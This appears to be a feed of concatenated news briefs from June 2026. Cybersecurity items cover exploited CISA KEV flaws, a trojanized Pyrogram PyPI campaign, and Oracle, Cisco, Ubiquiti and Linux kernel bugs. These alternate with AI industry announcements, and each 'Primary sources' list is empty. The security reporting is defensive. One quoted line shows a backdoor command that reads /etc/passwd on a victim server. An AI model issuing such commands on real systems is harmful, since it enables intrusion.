CISA flags Microsoft Defender ‘BlueHammer’ LPE in ransomware use, Oracle EBS takeover exploited, and a PyPI Pyrogram supply-chain backdoor

This brief covers the trailing ~48 hours (June 30 – July 2, 2026). Each item was checked against its primary source — CISA KEV, vendor advisories (Microsoft MSRC, Oracle), SEC filings, and original vendor research — with reputable outlet reporting used for context.

CISA flags Microsoft Defender “BlueHammer” flaw as exploited by ransomware gangs

CISA / Microsoft MSRC · June 30, 2026

CISA updated its Known Exploited Vulnerabilities Catalog to note that ransomware operators are now exploiting CVE-2026-33825 (“BlueHammer”), a high-severity local privilege escalation flaw in Microsoft Defender. The bug was leaked with proof-of-concept code in early April by a researcher known as “Nightmare Eclipse,” patched by Microsoft on April 14, and added to the KEV catalog on April 22 after zero-day exploitation. It lets a local attacker reach the SAM database and escalate to SYSTEM. Status: patched, actively exploited, in KEV (now flagged for ransomware use); Microsoft has not yet tagged it as exploited in its advisory.

“Insufficient granularity of access control in Microsoft Defender allows an authorized attacker to elevate privileges locally.” — Microsoft Security Response Center advisory

Source: Microsoft MSRC advisory · CISA KEV entry · BleepingComputer

“Operation Navy Ghost”: trojanized Pyrogram forks backdoor Telegram-bot developers on PyPI

Checkmarx · June 30, 2026

Checkmarx disclosed a supply-chain campaign, active since November 2025, in which at least eight malicious forks of the popular (but unmaintained) Pyrogram Telegram framework were published to PyPI — including pyrogram-styled, VLifeGram, and pyrogram-navy. Each embeds a hidden secret.py backdoor that registers covert Telegram command handlers, letting the operator run arbitrary Python or shell commands on the bot’s server. No CVE is assigned. Developers who installed any listed package should remove it, rotate all server credentials, and revoke Telegram bot tokens.

“When the attacker sends /asi cat /etc/passwd, this runs /bin/bash -c ‘cat /etc/passwd’ on the victim’s server and returns the output. This is repeatable with any shell command and runs under the infected application’s authority.” — Checkmarx

Source: Checkmarx research · BleepingComputer

Aflac discloses breach of its Japan subsidiary exposing policy, personal, and bank data

Aflac Incorporated (SEC 8-K) · June 30, 2026

In an SEC filing, Aflac reported that an unauthorized third party accessed systems at its wholly owned subsidiary Aflac Japan between June 15 and June 25, 2026, when the intrusion was discovered. Impacted files include policy and coverage details, personal information, and bank account information. Aflac says the incident is limited to Japan and did not affect its U.S. systems; the full scope remains under investigation. This is a separate incident from the Scattered Spider–linked breach Aflac disclosed a year earlier.

“Aflac Japan has determined that certain impacted files contain policy and coverage details, personal information, and bank account information … This incident is limited to systems in Japan.” — Aflac Incorporated, SEC Form 8-K

Source: SEC 8-K filing · BleepingComputer

Still developing

Critical Oracle E-Business Suite flaw now exploited in the wild

Oracle / Defused · June 29, 2026

Threat intelligence firm Defused reported active exploitation of CVE-2026-46817 (CVSS 9.8), an unauthenticated remote-takeover flaw in the File Transmission component of Oracle Payments within Oracle E-Business Suite. Oracle patched it in the May 2026 Critical Patch Update. It is not yet listed in CISA KEV; Shadowserver tracks over 450 EBS instances exposed online.

“CVE-2026-46817 (CVSS 9.8 unauth HTTP takeover in Oracle E-Business) is being exploited. Over the weekend, we observed an actor exploiting the vulnerability on our Oracle E-Business honeypots. This vulnerability has no known previous exploitation and no public POC code exists.” — Defused

Source: Oracle May 2026 CPU · NVD · BleepingComputer

SimpleHelp authentication-bypass flaw exploited to drop new “Djinn Stealer”

Horizon3.ai / Blackpoint · June 29, 2026

Attackers are exploiting CVE-2026-48558, a critical authentication-bypass vulnerability in SimpleHelp remote-management software (in OIDC configurations), to create privileged technician sessions. In an intrusion investigated by Blackpoint, the actor deployed a new loader (“TaskWeaver”) and a previously undocumented cross-platform infostealer (“Djinn Stealer”) that targets developer, cloud, and AI-tooling credentials. Around 1,000 vulnerable SimpleHelp servers were exposed at disclosure. Status: actively exploited; patch available.

“The compromised RMM platform provided the operator with a trusted administrative channel capable of transferring files and executing commands on systems managed through the server.” — Blackpoint

Source: Blackpoint research · BleepingComputer


This brief covers the trailing ~48 hours (June 30 – July 2, 2026).

Primary sources:

HP Scales Its OpenAI Frontier Partnership and California Adopts Claude Statewide

This brief covers the trailing ~72 hours (June 27–30, 2026). Every item below was confirmed on the originating organization’s own page, with a published date inside the window. It was a quiet stretch for model launches, led instead by two notable enterprise and government adoption moves — HP scaling its OpenAI partnership and California signing a statewide Anthropic deal.

HP Inc. scales its OpenAI Frontier strategic partnership

OpenAI · June 28, 2026

OpenAI said HP Inc. will scale activation of its OpenAI Frontier strategic partnership after a series of successful pilots, moving from experiments to enterprise-wide deployment. The work spans customer- and partner-facing experiences, customer telemetry insights, employee productivity, and software development, with Frontier serving as the connective layer that governs access, context, deployment, and evaluation across HP’s agents and AI workflows. OpenAI cited early proof points, including one engineer moving through 122 pull requests across 43 projects in weeks and a security team estimating roughly 82 hours/week of capacity unlocked.

“It has been an amazing tool, and I am using it daily.” — an HP engineer, quoted by OpenAI

Source: HP Inc. launches Frontier strategic partnership with OpenAI

California adopts Claude statewide in a first-of-its-kind Anthropic partnership

State of California · June 29, 2026

Governor Gavin Newsom announced that California has entered a partnership with Anthropic giving all state agencies — plus cities and counties — access to Claude at a 50% discount, bundled with free workforce training and GenAI technical assistance. Claude becomes the first AI productivity tool offered through the California Department of Technology’s new Statewide Information Technology Shared Services (SITeS) portal. The state noted existing Claude use at the DMV (customer service and wait times), the Department of Health Care Services, and CDT/CalOES cyber defense work using Claude Security and Claude Code.

“AI should not replace the human work of government; it should help our workers move faster, solve problems more effectively, and deliver better results for Californians.” — Governor Gavin Newsom

Source: Governor Newsom announces a first-of-its-kind partnership providing Anthropic tools to state agencies

Still developing

Ornith-1.0 · DeepReinforce · June 25, 2026 — Just ahead of this window, DeepReinforce released Ornith-1.0, an MIT-licensed open-weights family for agentic coding (9B and 31B Dense, 35B and 397B MoE) built on pretrained Gemma 4 and Qwen 3.5. Its distinguishing feature is a self-scaffolding training framework in which the model learns to author both solution rollouts and the task-specific harnesses that guide them. DeepReinforce reports the 397B flagship scores 77.5 on Terminal-Bench 2.1 and 82.4 on SWE-Bench Verified, matching Claude Opus 4.7. Source: Ornith-1.0: Self-Scaffolding LLMs for Agentic Coding.


This brief covers the trailing ~72 hours (June 27–30, 2026).

Primary sources:

CISA Flags Exploited Cisco CUCM SSRF and PTC Windchill RCE; JFrog Releases DirtyClone Linux Root Exploit

This brief covers cyber/InfoSec developments from the trailing ~48 hours (June 25–27, 2026). Every item below was confirmed against its primary advisory or the CISA KEV catalog, and only items with a primary-source disclosure inside the window are included.

CISA adds actively exploited Cisco Unified CM SSRF flaw (CVE-2026-20230) to KEV

Cisco · June 25, 2026

CISA added CVE-2026-20230 to its Known Exploited Vulnerabilities catalog on June 25, 2026, with a June 28 remediation deadline for federal agencies. The flaw is a server-side request forgery (CWE-918) vulnerability in Cisco Unified Communications Manager and Unified CM SME, carrying a CVSS 3.1 base score of 8.6 and a Cisco Security Impact Rating of Critical. An unauthenticated, remote attacker can send a crafted HTTP request to write files to the underlying OS and later escalate to root; exploitation requires the WebDialer service, which is disabled by default. Cisco first published the advisory on June 3 and has released fixed software (14SU6, 15SU5/COP1); public PoC code exists and outlets reported in-the-wild exploitation over the weekend prior to the KEV listing.

“A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root.” — Cisco Security Advisory cisco-sa-cucm-ssrf-cXPnHcW

Source: Cisco advisory · CISA KEV alert · BleepingComputer

PTC Windchill / FlexPLM RCE (CVE-2026-12569) added to KEV as web-shell attacks continue

PTC · June 25, 2026

CISA also added CVE-2026-12569 to the KEV catalog on June 25, 2026, with a June 28 deadline. The vulnerability is a critical remote code execution flaw (reported CVSS 9.3) in PTC’s Windchill PDMLink and FlexPLM product lifecycle management software, exploitable by an unauthenticated, remote attacker via deserialization/improper input validation. Attackers are dropping persistent JSP web shells (named with 16 hex characters under the Windchill login directory) for remote command execution and data exfiltration. PTC began releasing version-specific patches on June 17 and, in a June 25 update, published new indicators of compromise amid escalating activity. Given Windchill’s deployment across automotive, aerospace, defense, and manufacturing, the flaw poses a notable supply-chain risk.

“Over the last several hours, we’ve received continued reports of heightened threat activity. We urge you to apply all patches and remediations immediately.” — PTC Trust Center advisory, June 25, 2026 update

Source: PTC advisory · CISA KEV alert · The Hacker News

JFrog publishes working “DirtyClone” Linux kernel root exploit (CVE-2026-43503)

JFrog Security Research · June 25, 2026

JFrog Security Research published a full exploit walkthrough on June 25, 2026 for CVE-2026-43503, a high-severity (CVSS 8.8) local privilege escalation in the Linux kernel they dubbed “DirtyClone,” the first public demonstration for this DirtyFrag-family variant. The bug lives in the XFRM/IPsec path: cloning via __pskb_copy_fclone() drops the SKBFL_SHARED_FRAG safety flag, letting in-place IPsec decryption overwrite file-backed page-cache memory (e.g., patching /usr/bin/su in RAM) to gain root. Any local user able to acquire CAP_NET_ADMIN—often via unprivileged user namespaces—can exploit it, making multi-tenant cloud, Kubernetes, and container hosts the highest-risk environments. The fix was merged to mainline on May 21 (v7.1-rc5); Debian, Ubuntu, and Fedora are confirmed affected absent the full patch chain. No in-the-wild exploitation has been reported.

“The severity of this issue is significant because it allows any unprivileged local user to gain root access (LPE) by manipulating the Linux page cache. The attack is silent, leaves no kernel logs or audit traces, and bypasses common on-disk integrity monitoring tools.” — JFrog Security Research

Source: JFrog Security Research · CVE.org


This brief covers the trailing ~48 hours (June 25–27, 2026).

Primary sources:

OpenAI Previews the GPT-5.6 Family (Sol, Terra, Luna) and Grok Integrates With Interactive Brokers

This brief covers the trailing ~72 hours (June 25–28, 2026). Every item below was confirmed on the originating organization’s own page, with a published date inside the window. It was a quieter stretch than last week, led by OpenAI’s next-generation model preview and a notable new finance integration from xAI.

OpenAI previews the GPT-5.6 family: Sol, Terra, and Luna

OpenAI · June 26, 2026

OpenAI began a limited preview of a new model generation: GPT-5.6 Sol (its flagship), Terra (a balanced everyday model OpenAI says matches GPT-5.5 at 2x lower cost), and Luna (its fastest, most affordable tier). The release pairs stronger coding, biology, and cybersecurity capabilities with what OpenAI calls its most robust safety stack to date, including a new max reasoning effort and an ultra mode that uses subagents. Notably, the rollout is gated: at the U.S. government’s request, the models are starting with a small group of trusted partners via the API and Codex before broader availability, and are not in ChatGPT during the preview. Pricing runs from Luna at $1/$6 per million input/output tokens up to Sol at $5/$30.

“We don’t believe this kind of government access process should become the long-term default. It keeps the best tools from users, developers, enterprises, cyber defenders, and global partners who need them.” — OpenAI

Source: Previewing GPT-5.6 Sol: a next-generation model

Grok integrates with Interactive Brokers

xAI · June 25, 2026

xAI announced that Interactive Brokers now integrates with Grok, letting clients link an existing IBKR account to Grok at no cost and without opening a new account. Once connected, users can ask Grok to analyze their portfolio, run scenario models for sector and regional exposure, research market trends, and build trading strategies that generate order instructions in real time. The integration is set up through a connector inside Grok that redirects to Interactive Brokers’ login for authorization.

“From portfolio analysis to order instructions, these tools unify data, insight, and action so you can move from idea to decision instantly.” — xAI

Source: Explore the markets with Interactive Brokers and Grok

Still developing

Mistral OCR 4 · Mistral AI · June 23, 2026 — Just ahead of this window, Mistral released OCR 4, its latest document-intelligence model, adding bounding boxes, block classification, and inline confidence scores alongside extracted text, with support for 170 languages and single-container self-hosting. Source: Introducing Mistral OCR 4.


This brief covers the trailing ~72 hours (June 25–28, 2026).

Primary sources:

Exploited Ubiquiti UniFi OS and Lantronix Flaws Hit CISA KEV; Cisco CUCM and SD-WAN Bugs Under Active Attack

This brief covers the trailing ~48 hours (June 24–26, 2026). Every item below was verified against its primary source — CISA KEV alerts, vendor advisories, and original vendor research — with disclosure or exploitation activity confirmed inside the window.

Ubiquiti UniFi OS unauthenticated RCE chain exploited as zero-days, added to CISA KEV

CISA / Ubiquiti · June 23, 2026

CISA added three maximum-severity Ubiquiti UniFi OS flaws to its Known Exploited Vulnerabilities catalog: CVE-2026-34908 (improper access control, CVSS 10.0), CVE-2026-34909 (path traversal), and CVE-2026-34910 (improper input validation/command injection, CVSS 10.0). Chained together, they give a remote, unauthenticated, network-adjacent attacker code execution on UniFi OS devices. Ubiquiti shipped fixes in UniFi OS Server 5.0.8 on May 21 without acknowledging in-the-wild abuse, but users reported attacks that created rogue administrator accounts under the username “John Sim,” and BishopFox published an analysis of the unauthenticated RCE chain. CISA ordered federal agencies to patch by June 26 under BOD 26-04.

“We confirmed the bypass against a live [UniFi OS version] 5.0.6 virtual machine. Requests built this way reached internal backends that are supposed to require authentication.” — BishopFox

Source: CISA KEV alert; Ubiquiti Security Advisory Bulletin 064; BishopFox analysis; SecurityWeek

Lantronix EDS5000 command injection added to CISA KEV alongside the Ubiquiti flaws

CISA / Lantronix · June 23, 2026

CISA added CVE-2025-67038 (CVSS 9.8), an unauthenticated OS command-injection flaw in the Lantronix EDS5000 serial-to-IP converter, to the KEV catalog in the same update. The HTTP RPC module fails to sanitize the username parameter before concatenating it into a shell command used to log failed authentication attempts, allowing arbitrary OS commands to run with root privileges. The bug was originally disclosed in April as part of the BRIDGE:BREAK set of Lantronix and Silex vulnerabilities affecting OT and healthcare environments; it now carries the same June 26 federal patch deadline.

Source: CISA KEV alert; CVE.org record; SecurityWeek

Cisco Unified CM WebDialer SSRF (CVE-2026-20230) seen exploited in the wild

Cisco / Defused Cyber · June 24, 2026

Researchers reported active exploitation of CVE-2026-20230 (CVSS 8.6), an unauthenticated server-side request forgery flaw in Cisco Unified Communications Manager that can be used to write files and ultimately escalate to root. Cisco previously rated the issue Critical and confirmed public proof-of-concept code; exploitation is only possible where the WebDialer service is enabled, which is off by default. Cisco PSIRT had not confirmed in-the-wild abuse, and the flaw was not yet listed in CISA KEV at the time of reporting. Cisco recommends disabling WebDialer until patches (14SU6, 15SU5/COP1) are applied.

“Over the weekend we observed exploitation of CVE-2026-20230 – Cisco Unified CM (CUCM) WebDialer SSRF → root file-write (CVSS 8.6)… This is currently being exploited from a single source using an unvetted PoC, with genuinely-formatted file:// file-write payloads landing on our decoys.” — Defused (@DefusedCyber)

Source: Cisco advisory; Security Affairs

Mandiant: Cisco Catalyst SD-WAN zero-day (CVE-2026-20245) exploited months before disclosure

Google Mandiant / Cisco · June 25, 2026

Mandiant disclosed that an unknown threat actor exploited CVE-2026-20245 (CVSS 7.8) in Cisco Catalyst SD-WAN Manager as a zero-day at least two months before it was publicly disclosed. The flaw lets an authenticated attacker with netadmin privileges run arbitrary commands as root via a crafted file upload; attackers chained it with earlier authentication-bypass bugs (CVE-2026-20127, CVE-2026-20182) to reach netadmin in the first place. Mandiant observed intrusions against a communications service provider between late 2025 and March 2026, including creation of a rogue “troot” root account and extensive anti-forensic cleanup. Cisco has confirmed active exploitation and released fixes.

“In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access.” — Mandiant

Source: Mandiant report; Cisco advisory; Security Affairs


This brief covers the trailing ~48 hours (June 24–26, 2026).

Primary sources:

OpenAI and Broadcom Unveil the ‘Jalapeño’ Inference Chip, Anthropic Launches Claude Tag for Slack, and New Data on Codex Taking Over Knowledge Work

This brief covers the trailing ~72 hours (June 23–26, 2026). Every item below was confirmed on the originating organization’s own page, with a published date inside the window. It was a busy stretch led by OpenAI — a custom inference chip, a new economic-research paper, and a science case study — alongside Anthropic shipping a new way to work with Claude.

OpenAI and Broadcom unveil “Jalapeño,” a custom LLM inference chip

OpenAI · June 24, 2026

OpenAI and Broadcom unveiled Jalapeño, OpenAI’s first Intelligence Processor: an accelerator designed from scratch for LLM inference and the first chip in a multi-generation compute platform the two companies are building together. OpenAI says the program went from initial design to manufacturing tape-out in nine months — what it believes is the fastest ASIC development cycle ever for a high-performance advanced semiconductor — with parts of the design accelerated by OpenAI’s own models. Engineering samples are already running ML workloads in the lab, and the platform is targeted for initial deployment at gigawatt scale by the end of 2026.

“Jalapeño is part of our long-term full-stack infrastructure strategy to make compute more abundant, resulting in AI which is faster, more reliable, more affordable for people and businesses, and can be used to solve more important problems.” — Greg Brockman, President and Co-Founder, OpenAI

Source: OpenAI and Broadcom unveil LLM-optimized inference chip

Anthropic introduces Claude Tag, starting on Slack

Anthropic · June 23, 2026

Anthropic launched Claude Tag, a way for teams to delegate work to Claude as a member of a Slack channel. Anyone in a channel can tag @Claude to hand off a task, and the model builds context over time, takes initiative when “ambient” behavior is enabled, and can work asynchronously over hours or days with tightly scoped, admin-controlled access to tools and data. It runs on Opus 4.8, is available today in beta for Claude Enterprise and Team customers, and replaces the existing Claude in Slack app.

“Tagging @Claude is now one of the main ways we get things done at Anthropic. Today, 65% of our product team’s code is created by our internal version of Claude Tag.” — Anthropic

Source: Introducing Claude Tag

OpenAI publishes economic-research paper on Codex adoption

OpenAI · June 25, 2026

OpenAI released an Economic Research paper, “The shift to agentic AI: evidence from Codex,” documenting how agentic tools are changing knowledge work. The company reports that by May 2026, 80.6% of sampled individual Codex users made at least one request estimated to exceed 30 minutes of human work and 25.6% made one estimated to exceed eight hours. Internally, Codex has become the primary AI tool for every department — including Legal, Finance, and Recruiting — and non-developer adoption grew 137x among individual users since August 2025.

“As the tools improve, people use them for longer, more complex, and more cross-functional work. As time goes on, this is likely to be what the future of work looks like.” — OpenAI

Source: How agents are transforming work

OpenAI details how GPT-5 helped solve a 3-year-old immunology mystery

OpenAI · June 23, 2026

OpenAI published a case study on immunologist Derya Unutmaz of The Jackson Laboratory, who used GPT-5 Pro to revisit a shelved 2022 experiment on how glucose shapes T-cell development. The model proposed a mechanism — that deoxyglucose interferes with the protein IL-2, removing a barrier to T cells becoming inflammatory Th17 cells — and, in a separate test, correctly predicted the result of an unpublished experiment on lymphoma-killing CD8+ cells. OpenAI notes that subject-matter expertise remains essential to judge the significance of any AI-generated insight.

“GPT-5 came up with this really remarkable insight that retrospectively, makes perfect sense.” — Dr. Derya Unutmaz, The Jackson Laboratory and the University of Connecticut

Source: How GPT-5 helped immunologist Derya Unutmaz solve a 3-year-old mystery


This brief covers the trailing ~72 hours (June 23–26, 2026).

Primary sources: